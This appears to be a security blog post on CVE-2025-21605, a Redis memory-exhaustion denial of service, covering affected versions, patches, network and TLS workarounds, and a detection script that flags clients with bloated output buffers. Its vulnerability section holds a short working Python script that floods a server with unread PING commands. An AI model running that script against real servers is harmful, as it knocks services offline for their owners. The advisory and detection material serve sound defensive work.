Redis (Remote Dictionary Server) is an open-source, in-memory data structure store that can be used as a database, cache, and message broker. It is commonly used as a caching layer for web applications due to its ability to store key-value pairs in memory for fast access. The Redis project has recently acknowledged a vulnerability in their software that allows unauthenticated clients to trigger memory exhaustion, causing a denial of service condition in affected servers.
This post will discuss the CVE-2025-21605 vulnerability, its impact, and the available patches and workarounds to secure your Redis deployment.
Vulnerability Details
In Redis versions starting at 2.6 and prior to 7.4.3, an unauthenticated client can cause the server-side output buffer of its connection to grow without bound, eventually exhausting the server's memory and causing a denial of service. The default Redis configuration does not limit the output buffer of normal clients (the default is client-output-buffer-limit normal 0 0 0, i.e. no hard or soft limit), so replies queued for a client that keeps sending commands but never reads the answers accumulate indefinitely.
Requiring a password does not change this. When password authentication (requirepass) is enabled but the client never authenticates, every command it sends is still answered with a "-NOAUTH Authentication required." error reply, and those error replies are queued in the same unbounded output buffer.
The vulnerability has been assigned the identifier CVE-2025-21605 and has been patched in version 7.4.3.
The following snippet illustrates the vulnerable behaviour: an unauthenticated client keeps sending commands and deliberately never reads the replies, so the server's output buffer for that connection grows until memory runs out.
import socket

def exploit_redis(ip, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, port))
    try:
        while True:
            # Any command works; with requirepass set the server queues
            # "-NOAUTH" error replies instead, which grow the buffer just the same.
            sock.sendall(b'PING\r\n')
            # Never recv(): unread replies pile up in the server-side output buffer.
    except socket.error:
        pass
    finally:
        sock.close()

ip = "127.0.0.1"
port = 6379
exploit_redis(ip, port)
Mitigation and Patching
Redis has released a patch for this issue in version 7.4.3; the fix was also backported to the 7.2 and 6.2 maintenance branches as 7.2.8 and 6.2.18. Users are advised to upgrade to a fixed release on the branch they run.
If upgrading is not immediately feasible, the vulnerability can be mitigated without patching the redis-server executable by preventing unauthenticated clients from reaching the server at all. This can be achieved with network access controls (host firewalls such as iptables or nftables, cloud security groups, binding only to private interfaces), or by enabling TLS and requiring clients to authenticate with client-side certificates (tls-auth-clients yes), so that a connection that cannot complete the handshake never gets a command processed and no replies are queued for it. Note that requirepass alone is not a mitigation, because the NOAUTH error replies are queued in the same buffer.
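On a server that cannot be upgraded right away, it helps to be able to see the attack in progress: Redis reports each connection's queued reply bytes in the omem field of CLIENT LIST, and a client that is exploiting this issue shows a steadily growing omem while every healthy client sits near zero. The following is an added example, not code from the original post or from the Redis project: it parses CLIENT LIST output and flags connections whose output buffer exceeds a threshold. The field names (addr, omem, cmd, user) are the ones Redis prints; the 8 MiB threshold and the sample lines are our own constructed values.

```python
import re

# Added example: flag Redis connections whose server-side output buffer
# (omem, in bytes) has grown past a threshold, using CLIENT LIST output.
# The threshold and SAMPLE_CLIENT_LIST below are constructed for illustration.

OMEM_THRESHOLD_BYTES = 8 * 1024 * 1024  # 8 MiB; tune for your workload

def parse_client_list(text):
    """Turn CLIENT LIST output (one 'key=value key=value ...' line per client)
    into a list of dicts. Integer-looking values are converted to int."""
    clients = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        fields = {}
        for token in line.split(" "):
            key, sep, value = token.partition("=")
            if not sep:
                continue
            fields[key] = int(value) if re.fullmatch(r"-?\d+", value) else value
        clients.append(fields)
    return clients

def find_bloated_clients(text, threshold=OMEM_THRESHOLD_BYTES):
    """Return (addr, omem, cmd) for every client whose output buffer exceeds
    the threshold, largest first. Empty list means nothing suspicious."""
    hits = []
    for c in parse_client_list(text):
        omem = c.get("omem", 0)
        if isinstance(omem, int) and omem > threshold:
            hits.append((c.get("addr", "?"), omem, c.get("cmd", "?")))
    hits.sort(key=lambda h: h[1], reverse=True)
    return hits

# Constructed sample: two healthy clients and one whose unread replies are piling up.
SAMPLE_CLIENT_LIST = (
    "id=3 addr=10.0.0.5:51234 laddr=10.0.0.2:6379 fd=8 name= age=12 idle=0 "
    "flags=N db=0 sub=0 psub=0 multi=-1 qbuf=26 qbuf-free=20448 obl=0 oll=0 "
    "omem=0 tot-mem=22298 events=r cmd=client|list user=default\n"
    "id=4 addr=203.0.113.7:40001 laddr=10.0.0.2:6379 fd=9 name= age=300 idle=0 "
    "flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=0 obl=0 oll=41200 "
    "omem=674037760 tot-mem=674060058 events=rw cmd=ping user=default\n"
    "id=5 addr=10.0.0.9:51300 laddr=10.0.0.2:6379 fd=10 name= age=5 idle=1 "
    "flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=0 obl=0 oll=0 "
    "omem=0 tot-mem=1800 events=r cmd=get user=app\n"
)

if __name__ == "__main__":
    for addr, omem, cmd in find_bloated_clients(SAMPLE_CLIENT_LIST):
        print(f"{addr}: omem={omem} bytes, last cmd={cmd}")
```

In practice you would feed the script the live output of redis-cli CLIENT LIST from a scheduled job and respond with CLIENT KILL ID <id> on the flagged connection while the network-level block is put in place. Setting client-output-buffer-limit normal <hard> <soft> <seconds> in redis.conf also caps the buffer, but it applies to every normal client, legitimate ones included, so size it for your real reply volumes rather than treating it as a substitute for the upgrade.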
Original References
- Redis Security Page
- CVE-2025-21605 Details
- Redis 7.4.3 Release Notes
Conclusion
CVE-2025-21605 is a high-severity vulnerability affecting Redis servers from version 2.6 through 7.4.2 that allows unauthenticated clients to cause a denial of service through memory exhaustion. Upgrade to Redis 7.4.3 (or the fixed release on your maintenance branch), or apply the network-level workarounds above so that unauthenticated clients can no longer reach the server.
Keep your systems up to date and monitor the security news and advisories for any further updates on this and other related vulnerabilities!
Timeline
Published on: 04/23/2025 16:15:34 UTC